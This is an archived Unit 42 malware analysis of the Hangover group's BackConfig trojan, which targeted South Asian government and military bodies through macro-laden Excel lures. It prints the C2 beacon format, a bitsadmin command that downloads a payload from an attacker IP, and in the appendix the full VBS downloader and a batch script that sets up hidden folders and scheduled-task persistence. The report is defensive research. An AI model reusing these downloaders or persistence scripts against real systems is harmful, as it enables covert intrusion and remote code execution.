Updated BackConfig Malware Targeting Government and Military
Organizations in South Asia
By Alex Hinchliffe, Robert Falcone
Published: 2020-05-12 · Archived: 2026-04-02 12:26:59 UTC
Executive Summary
Unit 42 has observed activity over the last 4 months involving the BackConfig malware used by the Hangover
threat group (aka Neon, Viceroy Tiger, MONSOON). Targets of the spear-phishing attacks, using local and topical
lures, included government and military organizations in South Asia.
The BackConfig custom trojan has a flexible plug-in architecture for components offering various features,
including the ability to gather system and keylog information and to upload and execute additional payloads.
The initial infection occurs via a weaponized Microsoft Excel (XLS) document delivered via compromised
legitimate websites for which the URLs are most likely shared via email. The documents use Visual Basic for
Applications (VBA) Macro code which, if enabled by the victim, starts an installation process consisting of
multiple components that result in the plug-in loader payload being downloaded and executed. The modular nature
certainly allows for quicker changes to individual components and, perhaps more importantly for the attackers,
splits up the malicious behaviors in such a way that could thwart sandbox and dynamic analysis systems,
especially when analyzing the components in isolation.
Our threat prevention platform with WildFire detects activity associated with this threat group, while
simultaneously updating the ‘malware’ category within the PAN-DB URL filtering solution for malicious and/or
compromised domains that have been identified.
Indicators of compromise related to this research are documented at the end of this report and in the Adversary
Playbook for the Hangover threat group that can be accessed in the Unit 42 Playbook Viewer.
Starting Point
Unit 42 first saw activity involving the Windows PE executable file (SHA256:
84e56294b260b9024917c390be21121e927f414965a7a9db7ed7603e29b0d69c) when searching AutoFocus data
related to particular sectors and countries of interest.
The file was first seen on January 19th, 2020, having been downloaded by two organizations -- a government
department in one country and a military organization in another -- within minutes of each other. The source of the
download was http://212.114.52[.]148/request/httpsrequest and the file httpsrequest was stored locally as
dphc.exe. More details on how the malware was delivered are described later in the blog.
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 1 of 20
The choice of terminology in URL paths and file names when delivering BackConfig malware in this, and other
campaigns discussed later on, is clearly to blend in as benign operations, paths and filenames. Although spelled
differently, it could be easy to believe the payload relates to the DHCP networking service.
The purpose of this malware is to allow the actors to download and execute an executable file, as well as
download and run batch files to run commands on the end system.
This sample has a custom "decryption" routine that subtracts six from each character. The following strings are
decrypted using this method:
linkrequest[.]live
\\Adobe\\Driver\\dwg\\pid.txt
\\Adobe\\Driver\\dwg\\
\\Adobe\\Driver\\dwg\\wuaupdt.exe
The Trojan reads the following file to use in the URL of the C2 beacon. If the file does not exist, the executable
will exit without performing any further activities. The pid.txt file is created during the earlier delivery and
installation phases starting with the weaponized Excel document. More information about this setup process is
covered later in the delivery section. As previously mentioned, this behavior makes an automated analysis of the
individual executable payload component harder.
%USERPROFILE%\Adobe\Driver\dwg\pid.txt
The C2 channel uses HTTPS thanks to the INTERNET_FLAG_SECURE flag used when calling the
HttpOpenRequestA function. The beacon HTTP request will look like the following:
GET /orderme/[contents of pid.txt file] HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 @/NEW
Host: linkrequest[.]live [resolving to 23.106.123[.]87]
The Trojan will look for the following field and values within the HTTP response header:
"Content-Type: application"
"Content-Type: xDvsds"
"Content-Type: Bw11eW"
If the content-type field contains a value of application, the Trojan will extract a filename from the HTTP response
headers between the string filename and Content-Transfer-Encoding. It will use this filename to create a file in the
%USERPROFILE%\Adobe\Driver\dwg\ folder, which it will write the data in the HTTP response to. Based on the
other two Content-Types, we believe the filename provided will be either "wuaupdt.exe" or test.bat.
If the content-type field has a value of xDvsds, the Trojan will attempt to execute the following file using
ShellExecuteA and the "open" method:
%USERPROFILE%\Adobe\Driver\dwg\wuaupdt.exe
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 2 of 20
If the content-type field has a value of Bw11eW, the Trojan will attempt to execute the following file using
ShellExecuteA and the "open" method:
%USERPROFILE%\Adobe\Driver\dwg\test.bat
At the time of writing, the C2 appeared inoperational and no further payloads were seen. We believe that the
resultant wuaupdt.exe file would then provide further capabilities to steal information, log keystrokes, and provide
the ability to run additional commands either directly or via additional plugins which it would download, as
documented by the Qihoo 360 Threat Intelligence group in their investigation of prior campaigns here.
Unit 42 has conducted cursory binary diffing for many of the BackConfig executable files and did not find any
non-library function overlaps that would suggest that the payloads are based on the YTY or EHDev frameworks as
mentioned here and here.
PE Metadata
The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign
the executable purporting to be software from the Foxit Software Incorporated company based in California. It is
not known why the actors picked this company -- and others listed in Table 1 below -- to impersonate but, as
previously mentioned, their use of filenames and URLs makes their payloads appear benign and trustworthy.
Using this meta-data, together with information gleaned from infrastructure investigation, Unit 42 were able to
pivot around on AutoFocus data to find additional BackConfig PE executable samples. Those samples from the
last 12 months are listed in Tables 1 and 2 below.
SHA256 Compilation Time (UTC) First Seen (Pacific) Signer Name
84e5629... 01/20/2020 7:26:09am 01/19/2020 11:49:03pm
Foxit Software Incorporated
18ce3ee... 10/10/2019 9:22:11am 01/16/2020 4:30:26pm
4a4bc01... 11/21/2019 9:19:49am 01/16/2020 1:31:46am
91c67c1... 11/21/2019 9:19:49am 12/02/2019 2:03:41am wind0ws
de5b670... 11/21/2019 9:19:49am 11/21/2019 11:59:05pm
f79ebf0... 10/28/2019 5:35:26am 11/09/2019 10:32:09pm NVIDIA Corporation
31faeef... 10/10/2019 9:22:11am 10/13/2019 10:11:04pm Foxit Software Incorporated
d87b875... 09/12/2019 5:54:04am 09/26/2019 9:32:19am Digicert Global
1510996... 12/05/2018 4:35:03am 04/09/2019 10:30:16am Foxit Software Incorporated
Table 1. Describing PE compile times and Digital signatures used, ordered by first seen.
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 3 of 20
The Compilation Time stored in executable (SHA256: 84e5629...) appears to be after the point at which the file
was first seen by our WildFire analysis system. While the PE file timestamp could be modified post-compilation,
the oddity is more likely explained away with time zones -- 2349 Pacific time on the 19th is 1349 in Bangladesh
on the 20th, and 7:26am UTC is in the range of 11:26 to 13:26 across the South Asia region, which would make
the sample compilation quite recent with respect to the delivery of it.
More details about the self-signed digital certificates, as well as full hashes, can be found in the IOCs section at
the end of this report.
The following table shows the version information from the same PE files, grouped by similar File Description
fields. The order remains the same, except for the sample (SHA256: 18ce3ee...) which was first seen January 16th,
2020 but for some reason reverted to using exact version information seen in samples two to three months prior.
Namely, Link Finder.
SHA256
File
Description
File
Version
Product
Name
Product
Version
Copyright
84e5629...
Альберт
(Albert, in
English)
06.10.2015 Альберт 01.05.2015
Copyright @ 2015-2026
secosec
4a4bc01... Ссылка
(Link, in
English)
01.01.12 ссылка 10.01.2015
Copyright @ 2011-2021
secosec Inc. Все права
защищеныk (All rights
reserved, in English)
91c67c1...
de5b670...
18ce3ee...
Link Finder 01.01.12
Link
Finder
13,9,1632
Copyright @2011-2020
Techtest Inc. All Rights
Reserved
f79ebf0...
31faeef...
d87b875... scrapper 01.12.001 scrapper 13,6,1662
Copyright @Scrapper Ltd
Reserved
1510996... system process 2,1,1,2015
system
process
cleaner
2,1,1,2015
Copyright © 2004-2018
Foxit Software Inc. All
Rights Reserved
Table 2. Describing PE version info metadata, ordered by first seen and grouped on matching data.
Of the set, the file (SHA256: 1510996...) has most consistency in terms of a theme, using the Foxit Copyright
information, self-signed digital signature and even using the company logo, as shown in the Figure below, for the
executable file’s icon. The file’s copyright information only differs from that of Foxit’s Reader software by a
missing period symbol, implying it was copied rather than created.
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 4 of 20
The actors then moved to use seemingly fictitious company and product names while using a mixture of signer
names in their digital signatures. No file icons were used at all over the last 11 months.
Recent samples also included Cyrillic text in the file description, product name, and copyright fields, as shown
and translated in the table above. It’s hard to know if this is an attempt to set false flags as to the origins of the
BackConfig malware, or perhaps to make the content more relevant to specific targets within the victim
organizations.
Delivery and Installation
In this section, we describe how the various payloads are delivered based on what we have seen in our customer
networks, as well as what we have established through open-source research. Unit 42 has yet to see any evidence
of weaponized documents used to deliver BackConfig being attached on phishing emails and that phishing URL
links in emails appear to be the Hangover group’s modus operandi.
The remainder of this section focuses largely on Object Linking and Embedding (OLE) Microsoft Excel
documents, as they are most commonly used by the Hangover group, at least when it comes to the BackConfig
malware. Through infrastructure analysis however, Unit 42 was able to find a BackConfig PE sample (SHA256:
e28f1bc0b0910757b25b2146ad02798ee6b206a5fe66ce68a28f4ab1538d6a1f; first seen 10/24/2019) using the C2
domain matissues[.]com and dropped by the weaponised Rich Text Format (RTF) file (SHA256:
752c173555edb49a2e1f18141859f22e39155f33f78ea70a3fbe9e2599af3d3f) from the same day. The RTF used the
CVE-2017-11882 exploit against equation editor vulnerabilities in Office applications to execute the PE sample
which was a unique exploitation method compared to all other samples analyzed.
Compromised Third-Party Infrastructure
Continuing to pivot on data obtained from the samples found thus far, we discovered some related URLs relating
to compromised third-party infrastructure supporting the delivery of the BackConfig malware. The following table
lists some examples of compromised sites delivering weaponised XLS files with filenames, such as
Circular_No_03.xls (SHA256: 0aa5cf1025be21b18ab12d8f8d61a6fa499b3bbcdbdced27db82209b81821caf) and
Circullar_Nov_2017.xls (SHA256: ed638b5f33d8cee8f99d87aa51858a0a064ca2e6d59c6acfdf28d4014d145acb)
implying (even with incorrect spelling) that the contents is, or relates to, a letter or advertisement which is
distributed to a large number of people.
SHA-256
First
Seen
Related URL Description Location
be3f12b...
2019-
10
http://nsaimmigration[.]com/userfiles/image/
fbr.php and nphp_registration_form.php (both
HTTP 404)
Consultant and
Legal Advice
company
supporting students
to live and study
abroad.
Pakistan
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 5 of 20
0aa5cf1...
2018-
09
http://webtechhub[.]com/wordpress/wp-content/images/fbr_circular.php
Web design and
dev site running
outdated
WordPress
application
Pakistan
ed638b5...
2017-
11
http://alphamike.com[.]mv/housing
Shipping agency
for freight
forwarding and
cargo delivery.
Maldives
http://mgamphs.edu[.]bd/info/ (down)
Muhurigonj
Academy of Music
and Performance
High School.
Reference.
Bangladesh
Table 3. Compromised third-party infrastructure to support delivery of BackConfig.
Given the targeting related to these threats, and the compromised third-party websites, we believe the use of “fbr”
in some of the URLs above likely relates to the Federal Board of Revenue (FBR) government organization of
Pakistan. The “fbr” theme also runs into the VBA macro code. File ed638b5... contains the statement Const
WelcomePage = "FBR".
The old compromised hosting examples in Table 3 above do not rely on Hypertext Preprocessor (PHP) server-side
scripts to deliver the weaponized XLS files. Instead, the pages simply used HTTP response status 301 (Moved
Permanently) for URL redirection to said XLS, initiating the download. More recent examples make use of PHP
with URL filenames matching the social engineering theme, such as “fbr”. In addition, the actors use the PHP
script to log any visitors to the page noting in a file named “info.txt” the datetime stamp of the event, the client
operating system, and their IP address.
The location of the compromised third-party infrastructure or the organizations legitimately using them, align with
the targeting Unit 42 has seen. This could be pure coincidence, a sign from the threat actors that their intention is
to take advantage of weaknesses in the target country’s wider infrastructure, or the threat actors leveraging in-country infrastructure that may be considered more trustworthy by the intended victims and their security
solutions.
Palo Alto Networks’ WildFire sandbox analyzed sample ed638b5... on November 8th, 2017, and, as described in
the table above, the sample was hosted on two compromised websites: a Bangladesh school and a Maldivan
shipping agency. While Unit 42 has not seen Hangover activity in the Maldives, the archipelago is in the region
alongside other known targets and interestingly, swore in a new President about a week after Unit 42 analyzed the
sample.
The EXE payload (SHA256: 4104a871e03f312446ef2fb041077167a9c6679f48d48825cbc1584e4fa792cd)
downloaded directly by the VBA code in sample ed638b5... from the URL below relates to those documented by
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 6 of 20
BitDefender here. To date, Unit 42 has only seen 6 similar samples since the late-2017 timeframe for this sample,
compared to many more prior, perhaps indicating a change over of the custom payloads used by the Hangover
group. Certainly, there are some overlaping Tactics Techniques and Procedures (TTPs) between the older samples
and the more recent BackConfig samples.
http://chancetowin.quezknal[.]net/appstore/updatepatch/logs.exe
Evolution of Delivery Payloads
Before moving on to describe the most recent samples and installation methods used by the Hangover actors, the
timeline figure below provides a high-level view of the evolution in TTPs used.
Figure 2. Evolution of delivery payloads
Despite the evolution over the years, some habits are hard to break. Firstly, every weaponized XLS Unit 42 has
investigated loads a fake error message, such as the one shown in Figure 3 below, to trick the victim into thinking
that the file is corrupt and thus nothing has -- or will -- load as intended. Another fictitious error message text has
been used in the past often with poor spelling or grammar.
Figure 3. Example fake error message displayed to the victim.
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 7 of 20
Similarly, the version information metadata stored in all the Excel documents analyzed share the same Author and
Last Modified By names - Testing.
The following subsections describe the campaigns and malware as highlighted by the three most recent milestones
in the timeline figure above.
2019 Milestone: Multi-Component
Registration Form.xls (SHA256: be3f12bcc467808c8cc30a784765df1b3abe3e7a426fda594edbc7191bbda461)
listed in Table 3 above provides an example of the types of lures used by the threat actors.
Upon opening the XLS and enabling the macro code, the picture in Figure 4 below is shown on top white-background cells. As the filename suggests, it’s a registration form and relates to the Naya Pakistan Housing
program run by the Pakistani government to help solve the housing shortfall in the country. Eligible citizens
include government employees and registration forms were due by October 15th, 2019 (extended through
November 15th), meaning the timing and the lure of the campaign on October 25th were clearly planned to
increase the chances of compromise.
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 8 of 20
Figure 4. Social engineering lure against Pakistan government in October 2019
As the PHP webpages did not exist at the time of writing, Unit 42 cannot prove the XLS file be3f12b... was hosted
at the URL listed in row 1 of Table 3 above. However, because of the following points, we have high confidence
in the campaign relationship between the two.
1. 1. AutoFocus and VirusTotal first processed the XLS file be3f12b... on October 25th, 2019
2. VirusTotal processed the nsaimmigration... URL on the same day
3. A specific HTTP GET request URL using the notation nphp_registration_form.php?r= was
processed in VirusTotal on the same day, and has relations to
http://185.203.119[.]184/fin_div/session, which matches the IP address and URL structure in the
VBS code dropped by the XLS be3f12b....
4. The name of the PHP webpage nphp_registration_form.php relates to the filename of the XLS.
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 9 of 20
The VBA macro code in the XLS file be3f12b... differed somewhat from that of the samples of the previous years.
Instead of directly storing encoded EXE files or running batch shell commands directly from the VBA code itself,
it retrieved the content from hidden columns in the Excel sheet, starting at column 27 or “AA”, which is likely to
be off-screen for most people. Once the font colour was changed, the “setup” batch code component as per
previous variants, and the new Visual Basic Script (VBS) downloader component were revealed in columns AA
and AB, respectively, as shown in figure 5 below.
Figure 5. VBS downloader and BAT setup file revealed in the XLS sheet.
Macro VBA code in the XLS parses the content of the two columns line by line writing the contents to their
respective files on disk and executing them following the same process flow as described below in Figure 6.
2019 Milestone: BITS and ZIPs
A more recent weaponized XLS file (SHA256:
021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce68b) was analyzed by WildFire on
November 15th, 2019 and exposed some new techniques. On this occasion, the VBA macro code contained a
decimal-encoded ZIP file of only 1,062 bytes in size. Inside the ZIP archive were two text files that would be
decompressed to a folder driverkit. One file, driverkit.bat, is the “setup” BAT file already discussed in this report
and listed in the appendix section. The other file, Winmgt.txt, is an adaptation of the VBS downloaded also
described in this report. However, instead of a direct HTTP download using an MSXML DOM object, this version
writes the following contents to Winmgt_Drive.bat, which is executed by a third scheduled task created by the
“setup” BAT file.
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 10 of 20
echo off
bitsadmin /transfer Microsoft_Update /download /priority high
http://185.203.119[.]184/winmgt/winmgt.exe
%USERPROFILE%\Adobe\Driver\pdf\winmgt.exe
del %0
2020 Milestone: Fine Tuning
The following execution flow diagram is based on one of the most recent weaponized documents Unit 42 has seen
Invoice.xls (SHA256: 8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c; first seen
2020-01-15).
The infection process consists of multiple components as just described. The “setup” batch (BAT) file coordinates
much of the infection process of the BackConfig plug-in loader once the VBA has written it to disk and executed
it.
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 11 of 20
Figure 6. Execution flow of BackConfig malware
The numbered bullet list below describes Figure 6.
1. 1. Text file Drive.txt (SHA-256:
4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and
contains the decimal-decoded VBS content.
2. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both
files is shown in the appendix section of this report.
3. Audio.txt is renamed to Audio.bat and executed.
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 12 of 20
4. Audio.bat cleans up any files and folders related to previous infections, and recreates the required
environment including creating the aforementioned pid.txt file, and setting various folders and files
to be hidden from a default Windows Explorer view. The contents of pid.txt is the victim’s computer
name concatenated with a hyphen followed by a random number, although I believe the code used
would not work as intended.
5. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist:
dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals.
6. Finally, before deleting itself, Audio.bat will rename Drive.txt to Drive.vbs. When Drive.vbs is
eventually executed by the task scheduler, it will download the BackConfig executable payload. In
the case of file 8892279f3... the remote location is http://185.203.119[.]184/Dropbox/request.
7. When dphc.exe is eventually executed by the task scheduler, it first checks for the presence of
pid.txt (step 4.) and only continues if the file exists.
Ultimately, the XLS writes two files to disk, one of which -- the BAT -- immediately modifies some system
settings and creates two scheduled tasks. However, this behaviour may not be enough to determine the
components as malicious. Only after 20 minutes will the task scheduler execute the VBS downloader component
and launch the BackConfig loader EXE, by which time analysis systems may have stopped monitoring.
ATT&CK
The following table describes the TTPs associated with the multiple campaigns described in this report.
Tactic Technique (Mitre ATT&CK ID)
Technical Information Gathering
Acquire OSINT data sets and information (T1247)
Conduct social engineering (T1249)
Adversary Opsec Compromise 3rd party infrastructure to support delivery (T1312)
Build Capabilities
Create custom payloads (T1345)
Obtain/re-use payloads (T1346)
Stage Capabilities Upload, install, and configure software/tools (T1362)
Initial Compromise Spear Phishing Link (T1192)
Execution
User Execution (T1204)
Exploitation for Client Execution (T1203)
Execution, Persistence Scheduled Task (T1053)
Defense Evasion Code Signing (T1116)
Deobfuscate/Decode Files or Information (T1140)
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 13 of 20
Hidden Files and Directories (T1158)
Obfuscated Files or Information (T1027)
Defense Evasion, Execution Scripting (T1064)
Defense Evasion, Persistence BITS Jobs (T1197)
Command & Control
Commonly Used Port (T1043)
Standard Application Layer Protocol (T1071)
Standard Cryptographic Protocol (T1032)
Remote File Copy (T1105)
Conclusion
The Hangover group (aka Neon, Viceroy Tiger, MONSOON) is active and targeting, according to Unit 42’s
visibility, government and military organisations in South Asia using spear-phishing emails containing letters or
government forms to lure victims into browsing to compromised websites serving weaponized Excel documents
that install the BackConfig Trojan. Almost exclusively, Unit 42 has seen the use of weaponized documents that
require user execution. Only once in the last six months have we seen use of exploits to circumvent the need for
the user to execute any part of the installation chain.
The evolution of BackConfig’s primary and secondary payloads has seen different methods used for executing
commands and deploying executables both with and without obfuscation.
The latest versions contain modular components making it easier to update and re-use code in order to rapidly
deploy their campaigns in a timely manner to have the highest chance of success. The method in which the latest
samples execute also indicates the group’s focus on trying to evade sandbox and other automated analysis systems
by breaking down malicious activity into chunks that each seem relatively benign.
Protections:
Palo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report
with our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections
to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat
Alliance, visit www.cyberthreatalliance.org. (This is added to blogs pre-shared with the CTA, when loaded into
WordPress it will be added when appropriate).
Indicators of Compromise
Delivery Documents
56349cf3188a36429c207d425dd92d8d57553b1f43648914b44965de2bd63dd6
8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 14 of 20
021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce68b
be3f12bcc467808c8cc30a784765df1b3abe3e7a426fda594edbc7191bbda461
0aa5cf1025be21b18ab12d8f8d61a6fa499b3bbcdbdced27db82209b81821caf
ed638b5f33d8cee8f99d87aa51858a0a064ca2e6d59c6acfdf28d4014d145acb
752c173555edb49a2e1f18141859f22e39155f33f78ea70a3fbe9e2599af3d3f (RTF using CVE-2017-11882)
Batch Files
4BAFBF6000A003EB03F31023945A101813654D26B7F3E402D1F51B7608B93BCB (Audio.txt / .bat from
Naya Housing campaign)
C94f7733fc9bdbcb503efd000e5aef66d494291ae40fc516bb040b0d1d8b46c9
6a35d4158a5cb8e764777ba05c3d7d8a93a3865b24550bfb2eb8756c11b57be3
750fc47d8aa8c9ae7955291b9736e8292f02aaaa4f8118015e6927f78297f580
5292f4b4f38d41942016cf4b154b1ec65bb33dbc193a7e222270d4eea3578295
f64dbcd8b75efe7f4fa0c2881f0d62982773f33dcfd77cccb4afc64021af2d9e
98d27e830099c82b9807f19dcef1a25d7fce2c79a048d169a710b272e3f62f6e
29c5dd19b577162fe76a623d9a6dc558cfbd6cddca64ed53e870fe4b66b44096 (driverkit.bat)
abe82ffb8a8576dca8560799a082013a7830404bb235cb29482bc5038145b003 (Winmgt_Drive.bat uses bitsadmin)
02c306bb120148791418136dcea8eb93f8e97fb51b6657fd9468c73fb5ea786c
VBS files
87e8c46d065ace580b1ed28565d1fddaa6df49da1ba83f7b3e9982cd8a0013f1 (One_drivers.txt / .vbs from Naya
Housing campaign)
952d4a9891a75e25e1c31a0514b97345ca0d8f240cdd4a57c8b3ff8a651a231a (Down_LinkLog.vbs)
a1cd89a684db41206fc71efe327ef608652931e749c24a3232908824cea426bb (Winmgt.vbs using BITS)
EXE Payloads
306fe259a250b2f0d939322cfb97787c4076c357fc9eb1f1cc10b0060f27f644
0f11fb955df07afc1912312f276c7fa3794ab85cd9f03b197c8bdbefb215fe92
84e56294b260b9024917c390be21121e927f414965a7a9db7ed7603e29b0d69c
18ce3eebbb093a218a8f566b579a5784caee94fadcda8f8c0d21f214ce2bd8b9
922d6e68ecac6dbfdd1985c2fae43e2fc88627df810897e3068d126169977709
4a4bc01b20dd2aaa2a2434dc677a44cc85d9533bed30bc58b8026b877db028d5
677d4982d714bb47fab613ebe1921005509ed0d1e8965e7241994e38c3ade9f2
d3013204f1a151c72879afc213dca3cada8c3ea617156b37771bdd7b7b74057f
91c67c1cda67b60c82e14a5c32d79a4236f5a82136317162dfbde1a6054cf8c1
de5b670656cbdbcf11607f01a6f93644765d9647ddab39b54946170b33f7ac9a
f79ebf038c7731ea3a19628cb329cada4ebb18f17439d9c6cf19d361b0494e7b
9e141fe67521b75412419a8c88c199c8ebd2a135c7a8b58edced454fbc33cb77
6787242a810f8a5e1423e83790064a0a98954ab0802a90649fdd55a47d75695e
e28f1bc0b0910757b25b2146ad02798ee6b206a5fe66ce68a28f4ab1538d6a1f
07c97b253452a2a8eb7753ed8c333efeaa3546c005ffcfb5b3d71dc61c49abda
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 15 of 20
31faeefb4dc4e54b747387bb54a5213118970ccb2f141559f8e2b4dbfdbeb848
15109962da4899949863447bfdf6a6de87a8876f92adb7577392032df44ec892
D87b875b8641c538f90fe68cad4e9bdc89237dba137e934f80996e8731059861
167c7d7c08d318bc40e552e6e32715a869d2d62ba0305752b9b9bece6b9e337e
4104a871e03f312446ef2fb041077167a9c6679f48d48825cbc1584e4fa792cd (example of older set of
downloaders)
b18697e999ed5859bfbc03e1d6e900752e1cdcd85ddb71729e2b38161366e5b5 (driverkit.zip)
Infrastructure
linkrequest[.]live (23.106.123[.]87)
matissues[.]com
unique.fontsupdate[.]com
185.203.119[.]184
212.114.52[.]148
Digital Signatures
The following list of self-signed digital certificates is not exhaustive, and only relates to those seen on BackConfig
PE executables samples over the past twelve months.
Foxit:
thumbprint: 79635cb32cf16cf6bddfd563b09d7aa99ccb2c01
issuer: CN=Foxit Software Incorporated
subject: CN=Foxit Software Incorporated
version: 3
algorithm: sha1WithRSAEncryption
serial: 50:53:ce:ad:42:c2:70:84:4f:55:bc:76:a4:23:6c:c8
valid from: 1/1/2018
valid to: 1/1/2024
Wind0ws:
thumbprint: aa9010ff841c67cf8fb88d7f1e86a778b35bcba0
issuer: CN=wind0ws
subject: CN=wind0ws
version: 3
algorithm: sha1WithRSAEncryption
serial: 88:de:2e:60:7f:48:2c:81:44:54:32:29:98:22:69:70
valid from: 1/1/2019
valid to: 1/1/2025
NVIDIA:
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 16 of 20
thumbprint: 01ba433fdc7f9b1ad1baaea6c5fd69243d03d8c3
issuer: CN=NVIDIA Corporation
subject: CN=NVIDIA Corporation
version: 3
algorithm: sha1WithRSAEncryption
serial: 6d:39:d4:59:15:9e:8c:b3:41:da:bd:4c:dd:37:60:e1
valid from: 1/1/2019
valid to: 1/1/2025
Appendix
The following VBS and BAT code was extracted from XLS sample (SHA-256:
8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83).
VBS downloader component (SHA256:
4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1)
[Drive.txt -> Drive.vbs CODE]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
strFileURL = "http://185.203.119[.]184/Dropbox/request"
Set oShell = CreateObject("WScript.Shell")
strHomeFolder =
oShell.ExpandEnvironmentStrings("%USERPROFILE%")
strPath = "C:\Drivers\dphc.exe"
On Error Resume Next
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 17 of 20
16
17
18
19
20
21
22
23
Set objFSO = CreateObject("Scripting.FileSystemObject")
If objFSO.Fileexists(strPath) Then WScript.Quit()
Set objFSO = Nothing
objADOStream.SaveToFile strPath
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
“Setup” BAT component
[Audio.txt -> Audio.bat CODE]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Set oFile = fso.CreateTextFile("c:\Drivers\Audio.txt")
oFile.WriteLine ("echo off")
oFile.WriteLine ("md %USERPROFILE%\Adobe\Driver\pdf")
oFile.WriteLine ("md %USERPROFILE%\Adobe\Driver\dwg")
oFile.WriteLine ("md %USERPROFILE%\Daily\Backup\Files")
oFile.WriteLine ("attrib +a +h +s %USERPROFILE%\Adobe")
oFile.WriteLine ("attrib +a +h +s %USERPROFILE%\Daily")
oFile.WriteLine ("attrib +a +h +s C:\Drivers")
oFile.WriteLine ("del /f
%USERPROFILE%\Adobe\Driver\pdf\pid.txt")
oFile.WriteLine ("del /f
%USERPROFILE%\Adobe\Driver\dwg\pid.txt"
oFile.WriteLine ("SET /A %COMPUTERNAME%")
oFile.WriteLine ("SET /A RAND=%RANDOM% 10000 + 1")
oFile.WriteLine ("echo %COMPUTERNAME%-%RAND% >>
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 18 of 20
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
%USERPROFILE%\Adobe\Driver\pdf\pid.txt")
oFile.WriteLine ("echo %COMPUTERNAME%-%RAND% >>
%USERPROFILE%\Adobe\Driver\dwg\pid.txt")
oFile.WriteLine ("schtasks /delete /tn Winmgt_log /f")
oFile.WriteLine ("schtasks /delete /tn Yahoo_Drive /f")
oFile.WriteLine ("schtasks /create /sc minute /mo 10 /f /tn
Winmgt_log /tr C:\Drivers\dphc.exe")
oFile.WriteLine ("schtasks /create /sc minute /mo 20 /f /tn
Yahoo_Drive /tr C:\Drivers\Drive.vbs")
oFile.WriteLine ("ren C:\Drivers\Drive.txt Drive.vbs ")
oFile.WriteLine ("del %0")
oFile.Close
Set fso = Nothing
Set oFile = Nothing
Dim OldName, NewName
GivenLocation = "C:\Drivers\"
OldName = "Audio.txt"
NewName = "Audio.bat"
On Error Resume Next
Name GivenLocation & OldName As GivenLocation & NewName
Dim RetVal
RetVal = Shell("C:\Drivers\Audio.bat", vbHide)
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 19 of 20
Source: https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/
Page 20 of 20